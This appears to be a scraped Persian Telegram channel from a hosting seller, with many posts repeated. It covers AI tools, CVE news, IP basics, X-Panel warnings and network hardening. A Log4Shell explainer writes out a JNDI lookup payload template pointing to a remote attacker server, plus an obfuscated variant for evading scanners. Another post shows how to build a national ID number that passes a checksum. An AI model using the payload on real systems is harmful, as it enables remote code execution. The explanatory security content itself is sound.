از آنجا که همه ما با Midjourney آشنا هستیم، ابزاری قدرتمند مبتنی بر هوش مصنوعی برای تولید تصاویر با خلاقیت های خارق العاده میباشد. اخیرا استفاده از این ابزار در دیسکورد بدون دریافت اشتراک ممکن نیست!
سایت Leonardo AI با قابلیتهای بیشتر و رابط کاربری بهتر جایگزین مناسبی برای Midjourney میباشد که بخشی از قابلیت این هوش مصنوعی را در زیر عنوان میکنم:
1- باز بودن همه قابلیتها به صورت رایگان(فقط با محدودیتهای روزانه)
2- تولید تصاویر بر اساس مدلهای مختلف
3- ویرایش و گسترش تصویر با قابلیت Canvas
4- استفاده از متن NOT شده در تولید عکس
5- بالا بردن وضوح و رزولیشین عکس تولید شده
برای دسترسی به ابزارهای Leonardo AI وارد سایت زیر بشید و با استفاده از اکانت Discord اقدام به ثبتنام و تولید عکس کنید:
🌐 https://leonardo.ai/
💠 @one3erver
سایت Leonardo AI با قابلیتهای بیشتر و رابط کاربری بهتر جایگزین مناسبی برای Midjourney میباشد که بخشی از قابلیت این هوش مصنوعی را در زیر عنوان میکنم:
1- باز بودن همه قابلیتها به صورت رایگان(فقط با محدودیتهای روزانه)
2- تولید تصاویر بر اساس مدلهای مختلف
3- ویرایش و گسترش تصویر با قابلیت Canvas
4- استفاده از متن NOT شده در تولید عکس
5- بالا بردن وضوح و رزولیشین عکس تولید شده
برای دسترسی به ابزارهای Leonardo AI وارد سایت زیر بشید و با استفاده از اکانت Discord اقدام به ثبتنام و تولید عکس کنید:
🌐 https://leonardo.ai/
💠 @one3erver
❤1
❗️نقص جدید در افزونه وردپرس که توسط بیش از یک میلیون سایت تحت بهرهبرداری فعال، استفاده شده است!
یک آسیبپذیری امنیتی در افزونه محبوب وردپرس Essential Addons for Elementor به تازگی شناسایی شده است که میتواند به طور بالقوه برای دستیابی به حق دسترسی بالا در سایتهای آسیبدیده، مورد سوء استفاده قرار گیرد.
این آسیب پذیری که CVE-2023-32243 به آن اختصاص داده شده است، در نسخه 5.7.2 که در 11 مه 2023 ، برطرف شده است. این افزونه، بیش از یک میلیون نصب فعال دارد.
محقق Patchstack، گفت: «این افزونه دارای آسیبپذیری افزایش حق دسترسی تایید نشده بود و به هر کاربر تأیید نشده اجازه میدهد تا حق دسترسی خود را به هر کاربر در سایت وردپرس افزایش دهد.
بهرهبرداری موفقیتآمیز از نقص میتواند به یک عامل تهدید اجازه دهد تا رمز عبور هر کاربر دلخواه را بازنشانی کند، تا زمانی که طرف مخرب از نام کاربری خود آگاه باشد. اعتقاد بر این است که این نقص از نسخه 5.4.0 وجود داشته است.
یک آسیبپذیری امنیتی در افزونه محبوب وردپرس Essential Addons for Elementor به تازگی شناسایی شده است که میتواند به طور بالقوه برای دستیابی به حق دسترسی بالا در سایتهای آسیبدیده، مورد سوء استفاده قرار گیرد.
این آسیب پذیری که CVE-2023-32243 به آن اختصاص داده شده است، در نسخه 5.7.2 که در 11 مه 2023 ، برطرف شده است. این افزونه، بیش از یک میلیون نصب فعال دارد.
محقق Patchstack، گفت: «این افزونه دارای آسیبپذیری افزایش حق دسترسی تایید نشده بود و به هر کاربر تأیید نشده اجازه میدهد تا حق دسترسی خود را به هر کاربر در سایت وردپرس افزایش دهد.
بهرهبرداری موفقیتآمیز از نقص میتواند به یک عامل تهدید اجازه دهد تا رمز عبور هر کاربر دلخواه را بازنشانی کند، تا زمانی که طرف مخرب از نام کاربری خود آگاه باشد. اعتقاد بر این است که این نقص از نسخه 5.4.0 وجود داشته است.
❤1👍1
یکسری سایتا هستن مثل این[ لینک سایت ] که بدون اینکه به دیتابیسی دسترسی داشته باشه تشخیص میده کدملی درسته یا نه
حالا چطوری ؟
با چیزی به نام checksum
کد ملی شما ۱۰ رقمه
۹ رقم اول رو جدا کنید
از چپ اولین عدد رو ضربدر ۱۰ کنید
دومین عدد ضربدر ۹
سومی ضربدر ۸
همینطور تا آخر که رقم آخر ضربدر ۲ میشه
حالا نتیجه هم ضرب ها رو با هم جمع کنید
عدد به دست امده رو تقسیم بر ۱۱ کنید و باقی مانده رو منهای ۱۱
اگه باقی مانده ۰ یا ۱ شد دیگه نیاز نیست منها رو انجام بدین
این عدد آخر رقم ۱۰ ام کارت ملی شماست
مثلا ۹ رقم اول یه کدملی 021225074 هستش
به این صورت باید حساب کنید
(0x10) + ( 2x9) + ( 1x8) + (2x7) + (2x6) + (5x5) + (0x4) + (7x3) + (4x2) = 106
106 mod 11 = 7 ( این باقی مانده میشه)
11 - 7 =4
رقم آخر ۴ میشه
حالا کد ملی 0212250744 که ساخته دست خودمونه رو داخل سایت وارد کنید تا چک کنه
البته checksum برای موارد دیگه هم استفاده میشه ، مثلا برای شماره شبا هم داریم
تو شبکه هم داخل هدر پکت ها استفاده میشه تا مقصد پکت ها متوجه بشه پکت سالمه یا نه
حالا چطوری ؟
با چیزی به نام checksum
کد ملی شما ۱۰ رقمه
۹ رقم اول رو جدا کنید
از چپ اولین عدد رو ضربدر ۱۰ کنید
دومین عدد ضربدر ۹
سومی ضربدر ۸
همینطور تا آخر که رقم آخر ضربدر ۲ میشه
حالا نتیجه هم ضرب ها رو با هم جمع کنید
عدد به دست امده رو تقسیم بر ۱۱ کنید و باقی مانده رو منهای ۱۱
اگه باقی مانده ۰ یا ۱ شد دیگه نیاز نیست منها رو انجام بدین
این عدد آخر رقم ۱۰ ام کارت ملی شماست
مثلا ۹ رقم اول یه کدملی 021225074 هستش
به این صورت باید حساب کنید
(0x10) + ( 2x9) + ( 1x8) + (2x7) + (2x6) + (5x5) + (0x4) + (7x3) + (4x2) = 106
106 mod 11 = 7 ( این باقی مانده میشه)
11 - 7 =4
رقم آخر ۴ میشه
حالا کد ملی 0212250744 که ساخته دست خودمونه رو داخل سایت وارد کنید تا چک کنه
البته checksum برای موارد دیگه هم استفاده میشه ، مثلا برای شماره شبا هم داریم
تو شبکه هم داخل هدر پکت ها استفاده میشه تا مقصد پکت ها متوجه بشه پکت سالمه یا نه
❤2
#هوش_مصنوعی که بهت میگه متن و زمینت باید چه رنگی باشه👌
🔻 با استفاده از این هوش مصنوعی به راحتی هرچه تمام تر میتونید متوجه بشید که چه رنگی برای فونتون مناسبه ؛ و با توجه به پس زمینتون کدوم رنگ بیشتر بولد میشه.
1️⃣ فقط کافیه وارد این سایت بشید.
2️⃣ به پایین اسکرول کنید و گزینه Contrast checker
3️⃣ حالا تو پنل مربع بالا رنگ متن رو انتخاب میکنید و از مربع پایین هم رنگ پسزمینرو باید سلکت کنید.
4️⃣در نهایت خود سایت بر اساس تعداد ستاره و نمره ای که بهت میده میگه دوتا رنگی که انتخاب کردین چقدر خوانایی دارن باهم
💠 @one3erver
🔻 با استفاده از این هوش مصنوعی به راحتی هرچه تمام تر میتونید متوجه بشید که چه رنگی برای فونتون مناسبه ؛ و با توجه به پس زمینتون کدوم رنگ بیشتر بولد میشه.
1️⃣ فقط کافیه وارد این سایت بشید.
2️⃣ به پایین اسکرول کنید و گزینه Contrast checker
3️⃣ حالا تو پنل مربع بالا رنگ متن رو انتخاب میکنید و از مربع پایین هم رنگ پسزمینرو باید سلکت کنید.
4️⃣در نهایت خود سایت بر اساس تعداد ستاره و نمره ای که بهت میده میگه دوتا رنگی که انتخاب کردین چقدر خوانایی دارن باهم
💠 @one3erver
🔥3
جهنمی به نام Log4Shell !
در ۹ دسامبر، یک آسیبپذیری حیاتی RCE یا همان اجرای کد از راه دور در Log4J آپاچی، یک سیستم گزارشگیری و لاگ بسیار رایج که توسط توسعهدهندگان برنامههای وب و سرور مبتنی بر جاوا و سایر زبانهای برنامهنویسی استفاده میشود، آشکار شد. این آسیبپذیری در طیف گستردهای ( چند صد میلیون دستگاه) از سرویسها و برنامههای کاربردی روی سرورها را تحت تأثیر قرار میدهد و این مورد، آن را به شدت خطرناک و حساس میکند – و آخرین بهروزرسانیها برای آن برنامههای کاربردی روی سرور ضروری است.
برای درک نحوه کارکرد این اکسپلویت به دو عکس زیر نگاه کنید:
(ادامه در پست بعد)
💠 @one3erver
در ۹ دسامبر، یک آسیبپذیری حیاتی RCE یا همان اجرای کد از راه دور در Log4J آپاچی، یک سیستم گزارشگیری و لاگ بسیار رایج که توسط توسعهدهندگان برنامههای وب و سرور مبتنی بر جاوا و سایر زبانهای برنامهنویسی استفاده میشود، آشکار شد. این آسیبپذیری در طیف گستردهای ( چند صد میلیون دستگاه) از سرویسها و برنامههای کاربردی روی سرورها را تحت تأثیر قرار میدهد و این مورد، آن را به شدت خطرناک و حساس میکند – و آخرین بهروزرسانیها برای آن برنامههای کاربردی روی سرور ضروری است.
برای درک نحوه کارکرد این اکسپلویت به دو عکس زیر نگاه کنید:
(ادامه در پست بعد)
💠 @one3erver
💯2
شرح کارکرد اکسپلویت :
باگ در نسخه های قبلی Log4J ناشی از ویژگی به نام message lookup substitution است. وقتی فعال شود (که به طور پیشفرض قبل از رفع آسیب پذیری فعال بود)، Log4j رشتههایی را که به JNDI در منابعِ کانفیگِ پیامهای گزارش و پارامترهای ارسال شده توسط برنامهها ارجاع میدهند، شناسایی میکند.
از آنجایی که Log4J در URL های ارسال شده در این رشته ها sanitize را انجام نمیدهد، مهاجم می تواند با یک پیام حاوی رشته جایگزین با URL مربوط به یک سرور مخرب درخواست های مخرب را برای برنامه هایی ایجاد کند که از Log4J استفاده میکنند.
💠 @one3erver
باگ در نسخه های قبلی Log4J ناشی از ویژگی به نام message lookup substitution است. وقتی فعال شود (که به طور پیشفرض قبل از رفع آسیب پذیری فعال بود)، Log4j رشتههایی را که به JNDI در منابعِ کانفیگِ پیامهای گزارش و پارامترهای ارسال شده توسط برنامهها ارجاع میدهند، شناسایی میکند.
از آنجایی که Log4J در URL های ارسال شده در این رشته ها sanitize را انجام نمیدهد، مهاجم می تواند با یک پیام حاوی رشته جایگزین با URL مربوط به یک سرور مخرب درخواست های مخرب را برای برنامه هایی ایجاد کند که از Log4J استفاده میکنند.
💠 @one3erver
💯2
در مورد برنامههای کاربردی وب، رشته میتواند بخشی از هر بخش از یک ارتباط HTTP باشد که ثبت و به عنوان یک دستور جایگزین که به سرور مخرب ارجاع میدهد کانفیگ میشود :
${jndi:[protocol]://[remote server and code address]}
انواع مختلفی از روش های مبهم سازی برای جلوگیری از شناسایی اسکن یا اکسپلویت استفاده می شود، از جمله استفاده از رشته های تو در تو برای فراخوانی رابط مانند:
(${${::-j}${::-n}${::-d}${::-I})
هنگامی که به Log4J ارسال می شود، رشته جایگزین به عنوان یک خطا گرفته شده و URL پردازش می شود. سپس کد لاگر از URL موجود در کد درخواست را انجام داده و پاسخ serialize شده و به هکر برمیگردد- که می تواند منجر به اجرای کد ارسال شده از URL مخرب که مربوط به هکر است ، شود.
منابع :
https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/
💠 @one3erver
${jndi:[protocol]://[remote server and code address]}
انواع مختلفی از روش های مبهم سازی برای جلوگیری از شناسایی اسکن یا اکسپلویت استفاده می شود، از جمله استفاده از رشته های تو در تو برای فراخوانی رابط مانند:
(${${::-j}${::-n}${::-d}${::-I})
هنگامی که به Log4J ارسال می شود، رشته جایگزین به عنوان یک خطا گرفته شده و URL پردازش می شود. سپس کد لاگر از URL موجود در کد درخواست را انجام داده و پاسخ serialize شده و به هکر برمیگردد- که می تواند منجر به اجرای کد ارسال شده از URL مخرب که مربوط به هکر است ، شود.
منابع :
https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/
💠 @one3erver
💯3
با عرض سلام و وقت بخیر خدمت عزیزان
دوستان عزیز از وب سایت جدید وان سرور رونمایی شد. لطفا نظرات و انتقادات خود را به ایدی تلگرام زیر ارسال بفرماید
support: @One3erver_support_bot
Website: https://one3erver.com
با تشکر
دوستان عزیز از وب سایت جدید وان سرور رونمایی شد. لطفا نظرات و انتقادات خود را به ایدی تلگرام زیر ارسال بفرماید
support: @One3erver_support_bot
Website: https://one3erver.com
با تشکر
وان سرور | One3erver
فروش سرور مجازی، اختصاصی، هاستینگ و دامنه
فروش سرور مجازی | فروش سرور احتصاصی | فروش هاست | ثبت دامین | افزایش فالوور اینستاگرام | فروش پیج اینستاگرام | فروش سرور فول وارز | نمایندگی هاست
❤4🤩3
مقدماتی بر IP آدرس ها - بخش اول
درک IP پرایوت / Private :
تفاوت آیپی های public یا private چیست ؟
آدرس های آی پی به دو دسته Private (خصوصی) Public (عمومی) تقسیم بندی می شوند . آدرس های Public همان آدرس هایی هستند که در نهایت در اینترنت شناسه یک کامپیوتر خاص می شوند و معرف و شناسنامه یک کامپیوتر یا دیوایس خاص در دنیای Public است . ولی آی پی آدرس های Private چه هستند ؟ قبل توضیح اینکه این آدرس ها چه هستند و چگونه در دنیای اینترنت قابل دسترسی می شوند , بهتر است بدانیم که آنها در یک رنج خاصی تعریف شده هستند و بقیه آدرس ها به غیر از این رنج آدرس های Public را تشکیل خواهند داد .
رنج اول : 10.0.0.0
رنج دوم : 172.16.0.0 تا 172.31.0.0
رنج سوم : 192.168.0.0
(ادامه در پست پایین) :
💠 @one3erver
درک IP پرایوت / Private :
تفاوت آیپی های public یا private چیست ؟
آدرس های آی پی به دو دسته Private (خصوصی) Public (عمومی) تقسیم بندی می شوند . آدرس های Public همان آدرس هایی هستند که در نهایت در اینترنت شناسه یک کامپیوتر خاص می شوند و معرف و شناسنامه یک کامپیوتر یا دیوایس خاص در دنیای Public است . ولی آی پی آدرس های Private چه هستند ؟ قبل توضیح اینکه این آدرس ها چه هستند و چگونه در دنیای اینترنت قابل دسترسی می شوند , بهتر است بدانیم که آنها در یک رنج خاصی تعریف شده هستند و بقیه آدرس ها به غیر از این رنج آدرس های Public را تشکیل خواهند داد .
رنج اول : 10.0.0.0
رنج دوم : 172.16.0.0 تا 172.31.0.0
رنج سوم : 192.168.0.0
(ادامه در پست پایین) :
💠 @one3erver
❤5
به طور خلاصه به طور زیر میشود :
IP Address
----------
IPv4 --> 32Bit --> 0 or 1
XXX.XXX.XXX.XXX --> Octet = 8bit
A 1 - 126 | Subnet Mask : 255.0.0.0 /8 | 10.0.0.0 /8
B 128 - 191 | Subnet Mask : 255.255.0.0 /16 | 172.16.0.0 172.31.0.0
C 192 - 223 | Subnet Mask : 255.255.255.0 /24 | 192.168.0.0
Private IP Address
Public IP Address
NET ID / HOST ID
NET ID : Subnet Mask
💠 @one3erver
IP Address
----------
IPv4 --> 32Bit --> 0 or 1
XXX.XXX.XXX.XXX --> Octet = 8bit
A 1 - 126 | Subnet Mask : 255.0.0.0 /8 | 10.0.0.0 /8
B 128 - 191 | Subnet Mask : 255.255.0.0 /16 | 172.16.0.0 172.31.0.0
C 192 - 223 | Subnet Mask : 255.255.255.0 /24 | 192.168.0.0
Private IP Address
Public IP Address
NET ID / HOST ID
NET ID : Subnet Mask
💠 @one3erver
❤6
❌ هشدار هشدار ❌
اخیرا مشکلات امنیتی جدی ای در اسکریپت X Panel گزارش شده که از قرار زیر میباشد :
این اسکرپیت به دلیل باگ های امنیتی که در آن وجود دارد میشود به سرور شما حملات ddos انجام داد، و یا از سرور شما اقدام به ddos به سرور های دیگر نمود !
و طبیعتا امکان مسدودی سرور استفاده کننده از سمت دیتاسنتر وجود دارد.
💠 @one3erver
اخیرا مشکلات امنیتی جدی ای در اسکریپت X Panel گزارش شده که از قرار زیر میباشد :
این اسکرپیت به دلیل باگ های امنیتی که در آن وجود دارد میشود به سرور شما حملات ddos انجام داد، و یا از سرور شما اقدام به ddos به سرور های دیگر نمود !
و طبیعتا امکان مسدودی سرور استفاده کننده از سمت دیتاسنتر وجود دارد.
💠 @one3erver
😱5❤1
معرفی aapanel
محصول، شرکت، BaoTa می باشد.
پنل aapanel کنترل پنلی ساده و درعین حال قدرتمند است که میتواند وب سرور را به راحتی و از طریق رابط گرافیکی مبتنی بر وب (GUI) مدیریت کند. تا کاربران تنها برروی پروژه و کار خود تمرکز کنند و نیز راحت تر زمان خود را برای توسعه اهداف خود صرف کنند.
مهمترین ویژگیهای aapanel چیست ؟
همانطور که گفتیم aaPanel کنترل پنل مدیریت سروری است که از سیستمعامل لینوکس پشتیبانی میکند. این کنترل پنل به راحتی سرور را از طریق ترمینال وب مدیریت کرده و موجب بهینهسازی عملیاتها میشود. برخی از مهمترین ویژگیهای aaPanel عبارتند از:
💠ایجاد و مدیریت وبسایتها، FTP و دیتابیسها
💠مدیریت فایل تصویری
مدیریت نرمافزار بصری
💠مدیریتvisual CPU
💠مدیریت حافظه
💠مدیریت نمودار نظارت بر جریان
💠مدیریت وظایف زمانبندی شده
💠ارائه خدمات باز و بستهشدن SSH
💠تغییرات پورت SSH
💠انتشار پورت فایروال
💠مشاهده گزارش عملیات CPU، حافظه، IO دیسک
💠نظارت بر دادههای IO شبکه
سایت رسمی:
www.aapanel.com
💠 @one3erver
محصول، شرکت، BaoTa می باشد.
پنل aapanel کنترل پنلی ساده و درعین حال قدرتمند است که میتواند وب سرور را به راحتی و از طریق رابط گرافیکی مبتنی بر وب (GUI) مدیریت کند. تا کاربران تنها برروی پروژه و کار خود تمرکز کنند و نیز راحت تر زمان خود را برای توسعه اهداف خود صرف کنند.
مهمترین ویژگیهای aapanel چیست ؟
همانطور که گفتیم aaPanel کنترل پنل مدیریت سروری است که از سیستمعامل لینوکس پشتیبانی میکند. این کنترل پنل به راحتی سرور را از طریق ترمینال وب مدیریت کرده و موجب بهینهسازی عملیاتها میشود. برخی از مهمترین ویژگیهای aaPanel عبارتند از:
💠ایجاد و مدیریت وبسایتها، FTP و دیتابیسها
💠مدیریت فایل تصویری
مدیریت نرمافزار بصری
💠مدیریتvisual CPU
💠مدیریت حافظه
💠مدیریت نمودار نظارت بر جریان
💠مدیریت وظایف زمانبندی شده
💠ارائه خدمات باز و بستهشدن SSH
💠تغییرات پورت SSH
💠انتشار پورت فایروال
💠مشاهده گزارش عملیات CPU، حافظه، IO دیسک
💠نظارت بر دادههای IO شبکه
سایت رسمی:
www.aapanel.com
💠 @one3erver
❤5
🏃🏻♂️Faster Copy & Paste
💠مطمعناً زمانی بوده که نیاز داشتید چند متن رو در لیست کپی خود داشته باشید
که در روند جای گذاری مطالب سرعت بیشتری را تجربه کنید و در وقت خود
صرفه جویی قابل توجهی را کرده باشید اما مجبور به طی کردن مسیر تکراری بودین!
🔰شرکت مایکروسافت قابلیت ترکیبی قرار داده که با فشردن
کلید های windows + v
لیست مطلب کپی شده را نمایش میدهد که امکان پبن کردن موارد مهم را فراهم میکند!
💠 @one3erver
💠مطمعناً زمانی بوده که نیاز داشتید چند متن رو در لیست کپی خود داشته باشید
که در روند جای گذاری مطالب سرعت بیشتری را تجربه کنید و در وقت خود
صرفه جویی قابل توجهی را کرده باشید اما مجبور به طی کردن مسیر تکراری بودین!
🔰شرکت مایکروسافت قابلیت ترکیبی قرار داده که با فشردن
کلید های windows + v
لیست مطلب کپی شده را نمایش میدهد که امکان پبن کردن موارد مهم را فراهم میکند!
💠 @one3erver
⚡4❤1
#Security
🌐 چگونه ساختار شبکه سختافزاری خود را امن کنیم؟
#Step_1
📝استفاده از سوئيچهایی با ساختار سلسله مراتبی (Hierarchy)
در زمان طراحی شبکه، مناسب است جهت کنترل هر چه بیشتر بر روی تجهیزات موجود در شبکه، معماری سوییچهای شبکه به صورت لایهای باشد و در هر لایه سوییچ خاص آن لایه در نظر گرفته شود. به عنوان مثال با توجه به ساختار كلي شبكه در بالاترین لایه از سوئيچ لايه 3 Layer)Core) استفاده گردد و در لايه 2 (Distribution Layer) از سوئيچهایی که خاص لایه دو طراحی شدهاند استفاده گردد (مثل Cisco 2960). طرز كار اين سوئيچها در اين ساختار، جهت ايجاد امنيت و مديريت شبكه امكانات بيشتري در اختيار میگذارد.
💠 @one3erver
🌐 چگونه ساختار شبکه سختافزاری خود را امن کنیم؟
#Step_1
📝استفاده از سوئيچهایی با ساختار سلسله مراتبی (Hierarchy)
در زمان طراحی شبکه، مناسب است جهت کنترل هر چه بیشتر بر روی تجهیزات موجود در شبکه، معماری سوییچهای شبکه به صورت لایهای باشد و در هر لایه سوییچ خاص آن لایه در نظر گرفته شود. به عنوان مثال با توجه به ساختار كلي شبكه در بالاترین لایه از سوئيچ لايه 3 Layer)Core) استفاده گردد و در لايه 2 (Distribution Layer) از سوئيچهایی که خاص لایه دو طراحی شدهاند استفاده گردد (مثل Cisco 2960). طرز كار اين سوئيچها در اين ساختار، جهت ايجاد امنيت و مديريت شبكه امكانات بيشتري در اختيار میگذارد.
💠 @one3erver
🔥3❤1
🖌توییت یاشار شاهین زاده
دیروز توییت وحیدو دیدم که x-panel آسیبپذیری امنیتی داره، با امیر رفتیم روش و نتیجهای که رسیدیم: «سریعا فقط پاکش کنین». باگهای خیلی خطرناکی داره مثلا: رو سرور میشه دستور با سطح دسترسی Root اجرا کرد، کل User Pass کاربرا افشا میشه که در ادامه توضیح میدم ⬇️
https://youtu.be/yeVeJgCPc0s
یاشو🔗
💠 @one3erver
دیروز توییت وحیدو دیدم که x-panel آسیبپذیری امنیتی داره، با امیر رفتیم روش و نتیجهای که رسیدیم: «سریعا فقط پاکش کنین». باگهای خیلی خطرناکی داره مثلا: رو سرور میشه دستور با سطح دسترسی Root اجرا کرد، کل User Pass کاربرا افشا میشه که در ادامه توضیح میدم ⬇️
https://youtu.be/yeVeJgCPc0s
یاشو🔗
💠 @one3erver
YouTube
All XPanels are prone to RCE
بچهها اگه از این پنل استفاده میکنین سریعا پاکش کنین
https://github.com/Alirezad07/X-Panel-SSH-User-Management
رشتوی توضیحات فنی:
https://twitter.com/voorivex/status/1678487975179481093
https://github.com/Alirezad07/X-Panel-SSH-User-Management
رشتوی توضیحات فنی:
https://twitter.com/voorivex/status/1678487975179481093
👍2🤯2❤1
#Security
🌐 چگونه ساختار شبکه سخت افزاری خود را امن کنیم؟
#Step_2
📝 عدم به كارگيري VTP Domain
توصيه ميشود كه در صورت امکان، تنظيمات vlan ها را بر روي سوئيچ ها به صورت دستي انجام داده و از اين پروتكل استفاده نكرد. لذا مي بايست VTP روي سوئيچ ها غير فعال شود. در اين روش تمامی سوئیچها عضو این Domain میباشند. سوئيچ core در ModeServer و بقیه سوئیچها در Client Mode کار میکنند. ضمناً VTP Password نيز جهت جلوگيري از حملات از نوع سوئيچينگ بايد در نظر گرفته شود.
💠 @one3erver
🌐 چگونه ساختار شبکه سخت افزاری خود را امن کنیم؟
#Step_2
📝 عدم به كارگيري VTP Domain
توصيه ميشود كه در صورت امکان، تنظيمات vlan ها را بر روي سوئيچ ها به صورت دستي انجام داده و از اين پروتكل استفاده نكرد. لذا مي بايست VTP روي سوئيچ ها غير فعال شود. در اين روش تمامی سوئیچها عضو این Domain میباشند. سوئيچ core در ModeServer و بقیه سوئیچها در Client Mode کار میکنند. ضمناً VTP Password نيز جهت جلوگيري از حملات از نوع سوئيچينگ بايد در نظر گرفته شود.
💠 @one3erver
❤2👾2